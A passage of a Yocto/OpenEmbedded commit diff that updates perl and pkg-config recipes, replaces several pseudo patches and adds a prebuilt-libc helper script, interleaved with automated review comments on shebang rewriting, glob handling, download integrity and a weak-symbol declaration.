rm -rf ${D}${docdir}/perl/html
+ sed -i "s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data
}
do_install_ptest() {
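Review bot: The added `sed` expression in `do_install_append` has no line address, so it rewrites every line of `config_data` that starts with `#!`, not only the interpreter line. Restricting it to the first line keeps the substitution from touching anything else in the script: `sed -i "1s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data`. A one-line comment saying why the shebang is rewritten (presumably a build-host perl path ends up in the installed script) would also help.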
diff --git a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
index bc154bbdc5..ef2b292352 100644
--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
chown -R root:root ${D}${PTEST_PATH}/samples
}
+RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
BBCLASSEXTEND="native nativesdk"
diff --git a/meta/recipes-devtools/perl/perl_5.30.1.bb b/meta/recipes-devtools/perl/perl_5.30.1.bb
index b53aff1216..bf81a023b8 100644
--- a/meta/recipes-devtools/perl/perl_5.30.1.bb
+++ b/meta/recipes-devtools/perl/perl_5.30.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Perl scripting language"
HOMEPAGE = "http://www.perl.org/"
+DESCRIPTION = "Perl is a highly capable, feature-rich programming language"
SECTION = "devel"
LICENSE = "Artistic-1.0 | GPL-1.0+"
LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \
@@ -28,6 +29,8 @@ SRC_URI = "https://www.cpan.org/src/5.0/perl-${PV}.tar.gz;name=perl \
file://CVE-2020-10878_1.patch \
file://CVE-2020-10878_2.patch \
file://CVE-2020-12723.patch \
+ file://CVE-2023-31484.patch \
+ file://CVE-2023-47038.patch \
"
SRC_URI_append_class-native = " \
file://perl-configpm-switch.patch \
@@ -43,6 +46,10 @@ SRC_URI[perl-cross.sha256sum] = "edce0b0c2f725e2db3f203d6d8e9f3f7161256f5d159055
S = "${WORKDIR}/perl-${PV}"
+# This is windows only issue.
+# https://ubuntu.com/security/CVE-2023-47039
+CVE_CHECK_WHITELIST += "CVE-2023-47039"
+
inherit upstream-version-is-even update-alternatives
DEPENDS += "zlib virtual/crypt"
@@ -146,8 +153,9 @@ do_install() {
install lib/ExtUtils/typemap ${D}${libdir}/perl5/${PV}/ExtUtils/
# Fix up shared library
- rm ${D}/${libdir}/perl5/${PV}/*/CORE/libperl.so
- ln -sf ../../../../libperl.so.${PERL_LIB_VER} $(echo ${D}/${libdir}/perl5/${PV}/*/CORE)/libperl.so
+ dir=$(echo ${D}/${libdir}/perl5/${PV}/*/CORE)
+ rm $dir/libperl.so
+ ln -sf ../../../../libperl.so.${PERL_LIB_VER} $dir/libperl.so
}
do_install_append_class-target() {
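Review bot: `dir=$(echo ${D}/${libdir}/perl5/${PV}/*/CORE)` is used unquoted and unchecked on the next two lines, so the new code silently assumes the glob resolves to exactly one directory. With no match `$dir` holds the literal pattern, and with several matches it holds a space-separated list, so `rm` and `ln -sf` then act on the wrong operands. A guard right after the assignment makes the failure explicit: `[ -d "$dir" ] || bbfatal "expected exactly one perl CORE directory, got: $dir"`. The body of `do_install` starts outside this hunk, so an earlier check may already cover this.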
diff --git a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
index 52ef2a9779..7bf68082b2 100644
--- a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
+++ b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b"
PV = "0.29.2+git${SRCPV}"
-SRC_URI = "git://anongit.freedesktop.org/pkg-config \
+SRC_URI = "git://gitlab.freedesktop.org/pkg-config/pkg-config.git;branch=master;protocol=https \
file://pkg-config-esdk.in \
file://pkg-config-native.in \
file://fix-glib-configure-libtool-usage.patch \
diff --git a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch b/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
deleted file mode 100644
index f01e699de7..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From 4e41a05de1f34ba00a68ca4f20fb49c4d1cbd2d0 Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Wed, 6 Nov 2019 12:17:46 +0000
-Subject: [PATCH] Add statx glibc/syscall support
-
-Modern distros (e.g. fedora30) are starting to use the new statx() syscall through
-the newly exposed glibc wrapper function in software like coreutils (e.g. the ls
-command). Add support to intercept this to pseudo.
-
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Submitted [Emailed to seebs]
----
- ports/linux/guts/statx.c | 48 ++++++++++++++++++++++++++++++++++++++++
- ports/linux/portdefs.h | 1 +
- ports/linux/wrapfuncs.in | 1 +
- 3 files changed, 50 insertions(+)
- create mode 100644 ports/linux/guts/statx.c
-
-diff --git a/ports/linux/statx/guts/statx.c b/ports/linux/statx/guts/statx.c
-new file mode 100644
-index 0000000..a3259c4
---- /dev/null
-+++ b/ports/linux/statx/guts/statx.c
-@@ -0,0 +1,42 @@
-+/*
-+ * Copyright (c) 2019 Linux Foundation
-+ * Author: Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int
-+ * statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf) {
-+ * int rc = -1;
-+ */
-+ pseudo_msg_t *msg;
-+ PSEUDO_STATBUF buf;
-+ int save_errno;
-+
-+ rc = real_statx(dirfd, pathname, flags, mask, statxbuf);
-+ save_errno = errno;
-+ if (rc == -1) {
-+ return rc;
-+ }
-+
-+ buf.st_uid = statxbuf->stx_uid;
-+ buf.st_gid = statxbuf->stx_gid;
-+ buf.st_dev = makedev(statxbuf->stx_dev_major, statxbuf->stx_dev_minor);
-+ buf.st_ino = statxbuf->stx_ino;
-+ buf.st_mode = statxbuf->stx_mode;
-+ buf.st_rdev = makedev(statxbuf->stx_rdev_major, statxbuf->stx_rdev_minor);
-+ buf.st_nlink = statxbuf->stx_nlink;
-+ msg = pseudo_client_op(OP_STAT, 0, -1, dirfd, pathname, &buf);
-+ if (msg && msg->result == RESULT_SUCCEED) {
-+ pseudo_debug(PDBGF_FILE, "statx(path %s), flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+ statxbuf->stx_uid = msg->uid;
-+ statxbuf->stx_gid = msg->gid;
-+ statxbuf->stx_mode = msg->mode;
-+ statxbuf->stx_rdev_major = major(msg->rdev);
-+ statxbuf->stx_rdev_minor = minor(msg->rdev);
-+ } else {
-+ pseudo_debug(PDBGF_FILE, "statx(path %s) failed, flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+ }
-+ errno = save_errno;
-+/* return rc;
-+ * }
-+ */
-diff --git a/ports/linux/statx/portdefs.h b/ports/linux/statx/portdefs.h
-new file mode 100644
-index 0000000..bf934dc
---- /dev/null
-+++ b/ports/linux/statx/portdefs.h
-@@ -0,0 +1,6 @@
-+/*
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ */
-+#include <sys/stat.h>
-+#include <sys/sysmacros.h>
-diff --git a/ports/linux/statx/wrapfuncs.in b/ports/linux/statx/wrapfuncs.in
-new file mode 100644
-index 0000000..c9cd4c3
---- /dev/null
-+++ b/ports/linux/statx/wrapfuncs.in
-@@ -0,0 +1 @@
-+int statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf);
-diff --git a/ports/linux/subports b/ports/linux/subports
-index a29044a..49081bf 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -54,3 +54,13 @@ else
- fi
- rm -f dummy.c dummy.o
-
-+cat > dummy.c <<EOF
-+#define _GNU_SOURCE
-+#include <sys/stat.h>
-+struct statx x;
-+EOF
-+if ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-+ echo "linux/statx"
-+fi
-+rm -f dummy.c dummy.o
-+
---
-2.17.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch b/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
deleted file mode 100644
index b2dbdad278..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From dbd34b1b2af8fbf44a0d5c37abe3448405819823 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:20:29 +0200
-Subject: [PATCH] maketables/wrappers: use Python 3
-
-Changelog indicates they should be compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- maketables | 2 +-
- makewrappers | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/maketables b/maketables
-index a211772..52285e2 100755
---- a/maketables
-+++ b/maketables
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2010, 2013 Wind River Systems, Inc.
- #
-diff --git a/makewrappers b/makewrappers
-index e84607d..b34f7eb 100755
---- a/makewrappers
-+++ b/makewrappers
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2011,2013 Wind River Systems, Inc.
- #
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
deleted file mode 100644
index 9c49e33b02..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From b0902e36108b49e6bc88d6b251cc2f8cffcd5a13 Mon Sep 17 00:00:00 2001
-From: Ricardo Ribalda <ricardo@ribalda.com>
-Date: Sun, 5 Apr 2020 11:40:30 +0000
-Subject: [PATCH] pseudo: On a DB fixup remove files that do not exist anymore
-
-If the user decides to fix a database, remove the files that do not
-exist anymore.
-If only DB test is selected do not change the behaviour (return error).
-
-Signed-off-by: Ricardo Ribalda <ricardo@ribalda.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137045]
----
- pseudo.c | 13 ++++++++++---
- 1 file changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/pseudo.c b/pseudo.c
-index 0f5850e..98e5b0c 100644
---- a/pseudo.c
-+++ b/pseudo.c
-@@ -1087,9 +1087,15 @@ pseudo_db_check(int fix) {
- int fixup_needed = 0;
- pseudo_debug(PDBGF_DB, "Checking <%s>\n", m->path);
- if (lstat(m->path, &buf)) {
-- errors = EXIT_FAILURE;
-- pseudo_diag("can't stat <%s>\n", m->path);
-- continue;
-+ if (!fix) {
-+ pseudo_diag("can't stat <%s>\n", m->path);
-+ errors = EXIT_FAILURE;
-+ continue;
-+ } else {
-+ pseudo_debug(PDBGF_DB, "can't stat <%s>\n", m->path);
-+ fixup_needed = 2;
-+ goto do_fixup;
-+ }
- }
- /* can't check for device type mismatches, uid/gid, or
- * permissions, because those are the very things we
-@@ -1125,6 +1131,7 @@ pseudo_db_check(int fix) {
- S_ISDIR(m->mode));
- fixup_needed = 2;
- }
-+ do_fixup:
- if (fixup_needed) {
- /* in fixup mode, either delete (mismatches) or
- * correct (dev/ino).
---
-2.21.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
deleted file mode 100644
index 33d4ef3b2f..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From a491aececfedf7313d29b80d626e0964fb533548 Mon Sep 17 00:00:00 2001
-From: Jacob Kroon <jacob.kroon@gmail.com>
-Date: Sun, 3 May 2020 06:24:03 +0200
-Subject: [PATCH] pseudo_ipc.h: Fix enum typedef
-
-'pseudo_access_t' is a type, so use typedef.
-
-Fixes building pseudo with gcc 10 where -fno-common is the default.
-
-Signed-off-by: Jacob Kroon <jacob.kroon@gmail.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137758]
----
- pseudo_ipc.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/pseudo_ipc.h b/pseudo_ipc.h
-index caeae5c..d945257 100644
---- a/pseudo_ipc.h
-+++ b/pseudo_ipc.h
-@@ -29,7 +29,7 @@ typedef struct {
- char path[];
- } pseudo_msg_t;
-
--enum {
-+typedef enum {
- PSA_EXEC = 1,
- PSA_WRITE = (PSA_EXEC << 1),
- PSA_READ = (PSA_WRITE << 1),
---
-2.26.2
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch b/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
deleted file mode 100644
index 17829ef3ac..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 86c9a5610e3333ad6aaadb1ac1e8b5a2c948d119 Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Mon, 25 Nov 2019 18:46:45 +0800
-Subject: [PATCH] realpath.c: Remove trailing slashes
-
-Linux system's realpath() remove trailing slashes, but pseudo's doesn't, need
-make them identical.
-
-E.g., the following code (rel.c) prints '/tmp' with system's realpath, but
-pseudo's realpath prints '/tmp/':
-
- #include <stdio.h>
- #include <limits.h>
- #include <stdlib.h>
-
- int main() {
- char out[PATH_MAX];
- printf("%s\n", realpath("/tmp/", out));
- return 0;
- }
-
-$ bitbake base-passwd -cdevshell # For pseudo env
-$ gcc rel.c
-$ ./a.out
-/tmp/ (but should be /tmp)
-
-This patch fixes the problem.
-
-Upstream-Status: Submitted [https://lists.yoctoproject.org/g/poky/message/11879]
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- ports/unix/guts/realpath.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/ports/unix/guts/realpath.c b/ports/unix/guts/realpath.c
---- a/ports/unix/guts/realpath.c
-+++ b/ports/unix/guts/realpath.c
-@@ -14,7 +14,14 @@
- errno = ENAMETOOLONG;
- return NULL;
- }
-- if ((len = strlen(rname)) >= pseudo_sys_path_max()) {
-+ len = strlen(rname);
-+ char *ep = rname + len - 1;
-+ while (ep > rname && *ep == '/') {
-+ --len;
-+ *(ep--) = '\0';
-+ }
-+
-+ if (len >= pseudo_sys_path_max()) {
- errno = ENAMETOOLONG;
- return NULL;
- }
---
-2.7.4
-
diff --git a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch b/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
deleted file mode 100644
index 161357d553..0000000000
--- a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 93d95ed2eaedcca110c214e1fe3f8896b1f6f853 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Tue, 17 Dec 2019 20:24:27 +0100
-Subject: [PATCH] xattr: adjust for attr 2.4.48 release
-
-Latest versions of attr have removed the xattr.h header,
-with the rationale that libc is providing the same wrappers.
-
-attr/attributes.h is providing the ENOATTR definition.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- ports/linux/subports | 5 +++--
- ports/linux/xattr/portdefs.h | 3 ++-
- 2 files changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/ports/linux/subports b/ports/linux/subports
-index 2c43ac9..740ec83 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -29,11 +29,12 @@ fi
- if $port_xattr; then
- cat > dummy.c <<EOF
- #include <sys/types.h>
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- int i;
- EOF
- if ! ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-- echo >&2 "Warning: Can't compile trivial program using <attr/xattr.h>".
-+ echo >&2 "Warning: Can't compile trivial program using <attr/attributes.h>".
- echo >&2 " xattr support will require that header."
- fi
- echo "linux/xattr"
-diff --git a/ports/linux/xattr/portdefs.h b/ports/linux/xattr/portdefs.h
-index 56cd3ca..068d39a 100644
---- a/ports/linux/xattr/portdefs.h
-+++ b/ports/linux/xattr/portdefs.h
-@@ -2,5 +2,6 @@
- * SPDX-License-Identifier: LGPL-2.1-only
- *
- */
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- #include <stdint.h>
diff --git a/meta/recipes-devtools/pseudo/files/build-oldlibc b/meta/recipes-devtools/pseudo/files/build-oldlibc
new file mode 100755
index 0000000000..85c438de4e
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
+#!/bin/sh
+#
+# Script to re-generate pseudo-prebuilt-2.33.tar.xz
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+for i in x86_64 aarch64 i686; do
+ if [ ! -e $i-nativesdk-libc.tar.xz ]; then
+ wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
+ fi
+ tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
+ cd $i-linux/lib
+ ln -s libdl.so.2 libdl.so
+ ln -s libpthread.so.0 libpthread.so
+ cd ../..
+done
+tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux
\ No newline at end of file
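Review bot: The script downloads the libc tarballs over plain `http://` and unpacks them with no integrity check, yet the result is repackaged as the prebuilt archive that pseudo links against. I would switch the URL scheme to `https://` and compare each download with a pinned digest before the `tar -xf`, e.g. `echo "<sha256-of-tarball>  $i-nativesdk-libc.tar.xz" | sha256sum -c -` with the real per-architecture values filled in. There is also no `set -e`, so a failed `wget`, `tar` or `cd` lets the loop carry on and the final `tar -cJf` can still produce an incomplete archive; adding `set -eu` after the header comment avoids that.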
diff --git a/meta/recipes-devtools/pseudo/files/moreretries.patch b/meta/recipes-devtools/pseudo/files/moreretries.patch
deleted file mode 100644
index adea2665b0..0000000000
--- a/meta/recipes-devtools/pseudo/files/moreretries.patch
+++ /dev/null
@@ -1,19 +0,0 @@
-Increase the number of retries in pseudo due to occasional slow
-server shutdowns.
-
-Upstream-Status: Pending
-RP 2016/2/28
-
-Index: git/pseudo_client.c
-===================================================================
---- git.orig/pseudo_client.c
-+++ git/pseudo_client.c
-@@ -1282,7 +1282,7 @@ pseudo_client_setup(void) {
- }
- }
-
--#define PSEUDO_RETRIES 20
-+#define PSEUDO_RETRIES 250
- static pseudo_msg_t *
- pseudo_client_request(pseudo_msg_t *msg, size_t len, const char *path) {
- pseudo_msg_t *response = 0;
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
index 0000000000..c453b5f735
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
+If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a
+binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread
+and dl are merged into libc itself.
+
+We need to use the older form of linking so use glibc binaries from an older release
+to force this. We only use minimal symbols from these anyway.
+
+pthread_atfork is problematic, particularly on arm so use the internal glibc routine
+it maps too. This was always present in the main libc from 2.3.2 onwards.
+
+Yes this is horrible. Better solutions welcome.
+
+There is more info in the bug: [YOCTO #14521]
+
+Upstream-Status: Inappropriate [this patch is native and nativesdk]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Tweak library search order, make prebuilt lib ahead of recipe lib
+Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+---
+ Makefile.in | 2 +-
+ pseudo_wrappers.c | 5 ++++-
+ 2 files changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile.in b/Makefile.in
+--- a/Makefile.in
++++ b/Makefile.in
+@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
+ libpseudo: $(LIBPSEUDO)
+
+ $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
+- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
+ pseudo_client.o pseudo_ipc.o \
+ $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
+
+diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
+--- a/pseudo_wrappers.c
++++ b/pseudo_wrappers.c
+@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
+ pseudo_mutex_holder = 0;
+ }
+
++extern void *__dso_handle;
++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
++
+ static void
+ _libpseudo_init(void) {
+ if (!_libpseudo_initted)
+- pthread_atfork(NULL, NULL, libpseudo_atfork_child);
++ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
+
+ pseudo_getlock();
+ pseudo_antimagic();
+--
+2.27.0
+
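Review bot: In the `pseudo_wrappers.c` part of this patch, `__dso_handle` is declared as an ordinary `extern`, so the test `&__dso_handle == NULL` in the `__register_atfork` call can never be true. The compiler is free to fold it away, and it may warn under `-Waddress`. The guard only has meaning if the symbol is weak, so the declaration should read `extern void *__dso_handle __attribute__((__weak__));`. Because the call now depends on a glibc-internal entry point, a short comment above the two `extern` lines should say that `__register_atfork` is what `pthread_atfork` maps to and point at the bug number from the patch header. `_libpseudo_init` continues past the end of the inner hunk.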
diff --git a/meta/recipes-devtools/pseudo/files/seccomp.patch b/meta/recipes-devtools/pseudo/files/seccomp.patch
deleted file mode 100644
index 283f997941..0000000000
--- a/meta/recipes-devtools/pseudo/files/seccomp.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-Pseudo changes the syscall access patterns which makes it incompatible with
-seccomp. Therefore intercept the seccomp syscall and alter it, pretending that
-seccomp was setup when in fact we do nothing. If we error as unsupported,
-utilities like file will exit with errors so we can't just disable it.
-
-Upstream-Status: Pending
-RP 2020/4/3
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-
-It fails to compile pseudo-native on centos 7:
-
-| ports/linux/pseudo_wrappers.c: In function ‘prctl’:
-| ports/linux/pseudo_wrappers.c:129:14: error: ‘SECCOMP_SET_MODE_FILTER’ undeclared (first use in this function)
-| if (cmd == SECCOMP_SET_MODE_FILTER) {
-| ^
-
-Add macro guard for seccomp to avoid the failure.
-
-Signed-off-by: Kai Kang <kai.kang@windriver.com>
-
-Index: git/ports/linux/pseudo_wrappers.c
-===================================================================
---- git.orig/ports/linux/pseudo_wrappers.c
-+++ git/ports/linux/pseudo_wrappers.c
-@@ -57,6 +57,7 @@ int pseudo_capset(cap_user_header_t hdrp
- long
- syscall(long number, ...) {
- long rc = -1;
-+ va_list ap;
-
- if (!pseudo_check_wrappers() || !real_syscall) {
- /* rc was initialized to the "failure" value */
-@@ -77,6 +78,20 @@ syscall(long number, ...) {
- (void) number;
- #endif
-
-+#ifdef SYS_seccomp
-+ /* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+ * so pretend to enable seccomp but really do nothing */
-+ if (number == SYS_seccomp) {
-+ unsigned long cmd;
-+ va_start(ap, number);
-+ cmd = va_arg(ap, unsigned long);
-+ va_end(ap);
-+ if (cmd == SECCOMP_SET_MODE_FILTER) {
-+ return 0;
-+ }
-+ }
-+#endif
-+
- /* gcc magic to attempt to just pass these args to syscall. we have to
- * guess about the number of args; the docs discuss calling conventions
- * up to 7, so let's try that?
-@@ -92,3 +108,44 @@ static long wrap_syscall(long nr, va_lis
- (void) ap;
- return -1;
- }
-+
-+int
-+prctl(int option, ...) {
-+ int rc = -1;
-+ va_list ap;
-+
-+ if (!pseudo_check_wrappers() || !real_prctl) {
-+ /* rc was initialized to the "failure" value */
-+ pseudo_enosys("prctl");
-+ return rc;
-+ }
-+
-+#ifdef SECCOMP_SET_MODE_FILTER
-+ /* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+ * so pretend to enable seccomp but really do nothing */
-+ if (option == PR_SET_SECCOMP) {
-+ unsigned long cmd;
-+ va_start(ap, option);
-+ cmd = va_arg(ap, unsigned long);
-+ va_end(ap);
-+ if (cmd == SECCOMP_SET_MODE_FILTER) {
-+ return 0;
-+ }
-+ }
-+#endif
-+
-+ /* gcc magic to attempt to just pass these args to prctl. we have to
-+ * guess about the number of args; the docs discuss calling conventions
-+ * up to 5, so let's try that?
-+ */
-+ void *res = __builtin_apply((void (*)()) real_prctl, __builtin_apply_args(), sizeof(long) * 5);
-+ __builtin_return(res);
-+}
-+
-+/* unused.
-+ */
-+static int wrap_prctl(int option, va_list ap) {
-+ (void) option;
-+ (void) ap;
-+ return -1;
-+}
-Index: git/ports/linux/guts/prctl.c
-===================================================================
---- /dev/null
-+++ git/ports/linux/guts/prctl.c
-@@ -0,0 +1,15 @@
-+/*
-+ * Copyright (c) 2020 Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int prctl(int option, ...)
-+ * int rc = -1;
-+ */
-+
-+ /* we should never get here, prctl is hand-wrapped */
-+ rc = -1;
-+
-+/* return rc;
-+ * }
-+ */
-Index: git/ports/linux/portdefs.h
-===================================================================
---- git.orig/ports/linux/portdefs.h
-+++ git/ports/linux/portdefs.h
-@@ -32,3 +32,5 @@ GLIBC_COMPAT_SYMBOL(memcpy,2.0);
-
- #include <linux/capability.h>
- #include <sys/syscall.h>
-+#include <sys/prctl.h>
-+#include <linux/seccomp.h>
-Index: git/ports/linux/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/wrapfuncs.in
-+++ git/ports/linux/wrapfuncs.in
-@@ -56,3 +56,4 @@ int getgrent_r(struct group *gbuf, char
- int capset(cap_user_header_t hdrp, const cap_user_data_t datap); /* real_func=pseudo_capset */
- long syscall(long nr, ...); /* hand_wrapped=1 */
- int renameat2(int olddirfd, const char *oldpath, int newdirfd, const char *newpath, unsigned int flags); /* flags=AT_SYMLINK_NOFOLLOW */
-+int prctl(int option, ...); /* hand_wrapped=1 */
diff --git a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch b/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
deleted file mode 100644
index bda7e4b202..0000000000
--- a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From b0b25fbc041a148d1de09f5a6503cd95973ec77c Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Tue, 25 Apr 2017 15:25:54 +0100
-Subject: [PATCH 3/3] pseudo: Handle too many files deadlock
-
-Currently if we max out the maximum number of files, pseudo can deadlock, unable to
-accept new connections yet unable to move forward and unblock the other processes
-waiting either.
-
-Rather than hang, when this happens, close out inactive connections, allowing us
-to accept the new ones. The disconnected clients will simply reconnect. There is
-a small risk of data loss here sadly but its better than hanging.
-
-RP
-2017/4/25
-
-Upstream-Status: Submitted [Peter is aware of the issue]
-
----
- pseudo_server.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/pseudo_server.c b/pseudo_server.c
-index dac3258..15a3e8f 100644
---- a/pseudo_server.c
-+++ b/pseudo_server.c
-@@ -802,6 +802,7 @@ pseudo_server_loop(void) {
- struct sigaction eat_usr2 = {
- .sa_handler = set_do_list_clients
- };
-+ int hitmaxfiles;
-
- clients = malloc(16 * sizeof(*clients));
-
-@@ -820,6 +821,7 @@ pseudo_server_loop(void) {
- active_clients = 1;
- max_clients = 16;
- highest_client = 0;
-+ hitmaxfiles = 0;
-
- pseudo_debug(PDBGF_SERVER, "server loop started.\n");
- if (listen_fd < 0) {
-@@ -878,10 +880,15 @@ pseudo_server_loop(void) {
- } else {
- serve_client(i);
- }
-+ } else if (hitmaxfiles) {
-+ /* Only close one per loop iteration in the interests of caution */
-+ close_client(i);
-+ hitmaxfiles = 0;
- }
- if (die_forcefully)
- break;
- }
-+ hitmaxfiles = 0;
- if (!die_forcefully &&
- (FD_ISSET(clients[0].fd, &events) ||
- FD_ISSET(clients[0].fd, &reads))) {
-@@ -903,6 +910,9 @@ pseudo_server_loop(void) {
- */
- pseudo_server_timeout = DEFAULT_PSEUDO_SERVER_TIMEOUT;
- die_peacefully = 0;
-+ } else if (errno == EMFILE) {
-+ hitmaxfiles = 1;
